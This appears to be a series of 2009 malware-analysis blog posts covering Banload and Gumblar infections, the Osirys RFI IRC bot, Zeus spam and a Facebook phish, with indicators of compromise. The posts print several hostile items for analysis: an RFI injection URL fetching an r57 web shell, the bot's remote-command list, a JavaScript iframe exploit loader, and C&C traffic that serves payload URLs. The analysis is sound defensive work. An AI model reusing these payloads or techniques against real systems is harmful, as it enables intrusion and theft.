Andrew Martin

While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free or a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24×01.hpg.ig.com.br/ree1.html
hxxp://gay24×01.hpg.ig.com.br/ree2.html
hxxp://gay24×02.hpg.ig.com.br/nl2.html
hxxp://gay24×02.hpg.ig.com.br/nl3.html
hxxp://gay24×02.hpg.ig.com.br/nl4.html
hxxp://gay24×02.hpg.ig.com.br/nl5.html
hxxp://gay24×02.hpg.ig.com.br/nl6.html
hxxp://gay24×02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.

Another method I’d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”.  A quick search leads us to this article over at abuse.ch.

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.

Just a quick reminder that the webcast for my paper “Mobile Device Forensics” will be taking place at 1pm EDT today. See my previous blog post for more information.

My RSS reader alerted me today to another wave of mass website compromises from Web Sense. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.

Summary

This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:

Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries

What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.

Details

Information on Websense’s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I’ll probably post another article on these guys shortly.

inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA

This IP hosts many other domains associated with the attack:

sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw

When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com

After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].

A VM of mine was infected and after loading internet explorer the malware lit up and did it’s thing. I’ve submitted a few files to VT but to be honest I haven’t had to much time to investigate to cover everything.

Virustotal 1

Virustotal 2

Binary Downloads, Ads and C&C communication

Interesting notes:

User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.

GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes

Other interesting network traffic

GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache

POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache

s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html

iogeelhchqhogmhgggdccnghdqdk

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html

Files & Reg Keys

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”

C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)

Other notable behavior

The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it’s presence by deleting various reg keys and the winpcap uninstaller.

At long last SANS and I have agreed on a date and time for me to deliver the first ever Paper of the Quarter webcast. My paper Mobile Device Forensics was picked as the Q1 2009 winner while I was away traveling South America, so I am a little late to the race. It will be held on June 24th at 1PM EDT, more information can be found here. I’ll be giving a brief overview of the paper and talking about how I analyzed a cellular phone, smartphone and MP3 player to gather data to use in a forensic investigation.

For the CISSPs reading my blog, you can probably claim CPE credits for attending the webcast, so don’t miss out!

For more information on the SANS Paper of the Quarter initiative, visit giac.org

As I was perusing my logs today on a lazy Sunday afternoon I found I was being attacked by more RFI bots than usual. To my surprise I realized it is because of my previous post on controlling RFI bots.  In my last post I included a dork that is frequently scanned for, and in doing so made my own blog a target! Now whenever a bot searches for the dork I mentioned, my blog will be returned as a possible target. The site is not vulnerable of course so I thought I would turn this to my/our advantage.

I’ve cobbled together a little script that will read my web logs and spit out all the attack attempts and some stats as well. The script may result in some false positives so please take that into consideration. The suspected attacks and stats will be updated once a day and if things go well I may seed some more dorks into the blog to generate more hits.

Hopefully this will be a good source of live data for anyone wanting to research RFI attacks, please keep in mind that most of the attacking domains are compromised web servers themselves.

The details are on the left sidebar under “RFI Attacks”.

Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

<bot> [*] RFI Scan started -> 75 sites/process
<bot> [+] Bug: index.php?sayfa=
<bot> [+] Dork: “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >YAHOO : 0 > “index.php?sayfa=”
<bot> [~] >ASK : 126 > “index.php?sayfa=”
<bot> [~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
<bot> [~] >UOL : 390 > “index.php?sayfa=”
<bot> [~] >MSN : 2997 > “index.php?sayfa=”
<bot> [~] >ALTAVISTA : 630 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >GOOGLE : 0 > “index.php?sayfa=”
<bot> [~] >MSN : 3057 > “index.php?sayfa=”
<bot> [~] >ASK : 363 > “index.php?sayfa=”
<bot> [~] >UOL : 225 > “index.php?sayfa=”
<bot> [~] >VIRGILIO : 0 > “index.php?sayfa=”
<bot> [~] >LYCOS : 1731 > “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [*] >EXPLOITABLES: 4561 “index.php?sayfa=”
<bot> [+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

<bot> (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
<bot> (uname -a) Windows NT HERA 5.0 build 2195
<bot> (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
<bot> [+] Trying to spread ..
<bot> [%] _/ Exploiting 100 / 4561
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user “andy” may issue administrative commands to the bot.

my @admins = (”andy”);
my $killpwd   = “adminpass”; #Password to Kill the Bot

Show bot commands

<andy> !help
<RFI[13]> [!] !response  > Test if the RFI Response is working
<RFI[13]> [*] !chid <new rfi-id>  > Change the RFI-Response
<RFI[13]> [*] !killme  > KILL The Bot
<RFI[13]> [!] !milw0rm rss  > Get the last Milw0rm bugs
<RFI[13]> [!] !new rfi bugs  > Get the last 10 RFI bugs
<RFI[13]> [!] !new lfi bugs  > Get the last 10 LFI bugs
<RFI[13]> [!] !new sql bugs  > Get the last 10 SQL Injection bugs
<RFI[13]> [!] !new rce bugs  > Get the last 10 RCE bugs
<RFI[13]> [!] !cari <bug> <dork> -p <sites/proc>  > Start the RFI Scanner
<RFI[13]> [!] !lfi <bug> <dork>  > Start the LFI Scanner
<RFI[13]> [!] !sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
<RFI[13]> [!] !rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner
<RFI[13]> [!] !mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc>  > Start the Mass Scan
<RFI[13]> [*] !cmd <bashline>  > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
<RFI[13]> [*] !sspread -s <RFI_Vuln_site>  > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
<RFI[13]> [*] !admin add/remove <nickname>  > To add/remove a nickname to/from the admin list
<RFI[13]> [*] /msg RFI[13] !Sec ON/OFF -p <pwd>  > To enable or disable Security Mode
<RFI[13]> [*] /msg RFI[13] !Spread ON/OFF -p <pwd>  > To enable or disable Spread Mode
<RFI[13]> [!] !info  > Get infos about the Bot

Gather information

<andy> !info
<RFI[13]> [i] Release : v6 -Private IrcBot
<RFI[13]> [i] Author  : Attacker Nickname
<RFI[13]> [i] Contact : attacker@some.com
<RFI[13]> [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
<RFI[13]> [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00
<RFI[13]> [i] Spread Mode: OFF
<RFI[13]> [i] Security Mode: OFF

Remove the bot (admin only)

<andy> !cmd rm myscan2.txt (optional step if you know the name of the bot file)
<andy> !killme
<RFI[13]> [!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = “attacker nickname”;
$authmail = “attacker@some.com”;

Gumblar compromises clients using 2 different exploits. The first is a Adobe Acrobat PDF exploit CVE-2008-2992 and the second is a Adobe Flash exploit. Unfortunately I haven’t been able to figure out which Flash exploit is employed as decoding flash is not an expertise of mine.

Here is the Wepawet output of the exploit script employed on each of the hostile domains I mentioned in my previous post.

Virus Total results for the main exploit script
Virus Total results for the flash exploit
Virus Total results for the PDF exploit

Exploit code is hosted at:

[gumblarserver].cn:8080/
[gumblarserver].cn:8080/cache/flash.swf
[gumblarserver].cn:8080/cache/readme.pdf

The following is the portion of the script that loads the exploits. The pdfswf() function executes and loads two iframes which reference the exploits.

function pdfswf()
{
PDF = new Array(”AcroPDF.PDF”, “PDF.PdfCtrl”);
for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
document.write(’<iframe src=”cache/readme.pdf”></iframe>’);
}
}
catch(e){}
}
try
{
obj = new ActiveXObject(”ShockwaveFlash.ShockwaveFlash”);

if (obj)
{
document.write(’<iframe src=”cache/flash.swf”></iframe>’);
}
}
catch(e){}
}
pdfswf();

On an interesting note, it appears the location of where the malware author might have compiled the flash file is embedded in the flash movie. This information is gathered from using: swfdump -atpdu flash.swf.

-=> 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20  erGC:\Documents
-=> 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76  and Settings\dev
-=> 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51  \Desktop\exp;;HQ

C:\Documents and Settings\dev\Desktop\exp

More Gumblar domains are hosted on 70.85.142.250 Link

I haven’t checked all of them, but these are the domains that I suspect are involved.

casinoslotbet.cn
bigbestfind.cn
autobestwestern.cn
casinoslotbet.cn
bigbestfind.cn
findbigbrother.cn
finditbig.cn
giantbeaversdiet.cn
giantnonfat.cn
greatbethere.cn
tvnameshop.cn

My personal favorite would have to be giantbeaversdiet.cn which hosts the binary payload that starts the chain of infection as described in the previous post. (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8)

Who comes up with these domain names anyway??

Lets take a look at a facebook phish I received recently. I received this message from a friend:

XXXXX sent you a message.

Subject: Hi

“Look at bestspace.be”

I’ve included a screenshot of the site below, note that it looks like the facebook login page complete with poor spelling of “helps”.

bestspace.be

The form sends your stolen credentials back to bestspace.be for processing:

<form method=”POST” action=”/?login_attempt=1″>

Digging a little deeper we find this site is hosted on  211.95.78.98 which hosts a few other malicious domains as well:

degunter.cn
daratop.cn

Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more information and so does the Malware Domains List.

The registrant of daratop.cn is steven_lucas_2000@yahoo.com, a couple of searches for this email reveals many different attacks that this individual has been involved in.

Example 1
Exmaple 2

In closing, all of these sites are hostile and should be blocked and avoided.

I first found out about Gumblar a couple days ago via one of Scan Safe’s blog posts. Responsible for 42% of “all malicious infections found on websites” (Sophos) during a 7 day period, Gumblar (JSRedir-R)  has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so much on what happens when a client is compromised. I will attempt to cover this portion of the attack in detail.

Summary

Once compromised by the Gumblar / Martuz / Geno attack, victims will have many pieces of malware loaded onto their machines, this malware does the following:

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

The exploits used are for Adobe Acrobat and Adobe Flash Player.

Some further reading:

unmaskparasites
dynamoo

FTP credential stealing

While observing the bot in my lab the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous and sure enough my credentials were ex filtrated in an encoded format.

POST /good/receiver/ftp HTTP/1.1
Host: 78.109.29.114
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw

Doing a little recon, we can see the attacker is using “Capture Manager v1.0″, a purchase which seems to be really paying off for them

Capture Manager

As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

An entry is made in the registry for winpcap: HKLM\SOFTWARE\WinPcap

SPAM

The first time I infected myself with the malware, a SPAM bot was installed that had communication that looked like Pushdo. However the second time I infected myself the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.

Fake Antivirus

As with so many attacks as of late, fake anti virus is also installed on the affected machines. In this case it is “System Security 2009″, screenshots below.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009

Search Hijacking

The next portion of the attack involves hijacking google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware will send the user to a page of it’s choosing filled with bogus search results. Here is an example of what you get after clicking a google search result for “car”.

Sys32dll.exe contains the proxy which has a firewall bypass rule added as well. Also note that a rule is added for port 80.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: “http=localhost:7171″
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: “80:TCP:*:Enabled:SYS32DLL”
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: “7171:TCP:*:Enabled:SYS32DLL”

Disable Security Software

In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by sending them to the windows system debugger. Here is an example:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: “ntsd -d”

And here is a list of all the blocked applications:

a2service.exe
ArcaCheck.exe
arcavir.exe
ashDisp.exe
ashEnhcd.exe
ashServ.exe
ashUpd.exe
aswUpdSv.exe
autoruns.exe
avadmin.exe
avcenter.exe
avcls.exe
avconfig.exe
avconsol.exe
avgnt.exe
avgrssvc.exe
avguard.exe
AvMonitor.exe
avp.com
avp.exe
AVP32.EXE
avscan.exe
avz.exe
avz4.exe
avz_se.exe
bdagent.exe
bdinit.exe
caav.exe
caavguiscan.exe
casecuritycenter.exe
CCenter.exe
ccupdate.exe
cfp.exe
cfpupdat.exe
cmdagent.exe
drwadins.exe
DRWEB32.EXE
drwebupw.exe
ekrn.exe
FAMEH32.EXE
filemon.exe
FPAVServer.exe
fpscan.exe
FPWin.exe
fsav32.exe
fsgk32st.exe
FSMA32.EXE
GFRing3.exe
guardgui.exe
guardxservice.exe
guardxup.exe
HijackThis.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVStart.exe
KPFW32.exe
KPFW32X.exe
Navapsvc.exe
Navapw32.exe
navigator.exe
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
niu.exe
nod32.exe
nod32krn.exe
Nvcc.exe
OllyDBG.EXE
outpost.exe
preupd.exe
procexp.exe
pskdr.exe
regedit.exe
regmon.exe
RegTool.exe
scan32.exe
SfFnUp.exe
Vba32arkit.exe
vba32ldr.exe
vsserv.exe
Zanda.exe
zapro.exe
Zlh.exe
zonealarm.exe
zoneband.dll

Domains

Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits and listen on port 8080 so they may seem offline if you try connecting directly.

autobestwestern.cn
bestlotron.cn
betbigwager.cn
denverfilmdigitalmedia.cn
educationbigtop.cn
filmtypemedia.cn
finditbig.cn
greatbethere.cn
hotslotpot.cn
liteautotop.cn
litebest.cn
litegreatestdirect.cn
litetopdetect.cn
lotbetsite.cn
lotwageronline.cn
mediahomenamemartvideo.cn
nameashop.cn
perfectnamestore.cn
playbetwager.cn
bestfindaloan.cn
finditbig.cn
litetopdetect.cn
litetopfindworld.cn
lotwageronline.cn
nanotopdiscover.cn
torrentoreactor.net
bestfindaloan.cn
finditbig.cn
litegreatestdirect.cn
lotwageronline.cn

These are additional domains involved in the attack:

nua20090515.com - C&C
i-site.ph - binary download
zz-dns.com - additional C&C?
main15052009.com - fake av related?
besthandycap.com
ya.ru
…and many more…

Other Information

Malware startup

1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: “C:\WINDOWS\system32\asferrort.exe srv”
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\Temp\wpv701242765100.exe”
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: “c:\windows\pp10.exe” (I also saw pp08.exe, so this name is variable)
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: “C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe”
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: “C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe”
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: “c:\windows\ld08.exe”

An additional security provider is also installed in the form of digiwet.dll, I have not investigated this piece of the attack.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: “msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll”

A BHO (browser helper object) is also installed here:

HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: “C:\WINDOWS\system32\547372\547372.dll”

One of the pieces of malware (ld08.exe) also hooks several APIs:

C&C communication

The magic number field below may be a key to encode the further communication to hamper analysis.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 581632
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;

Rnd: 982147
Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146: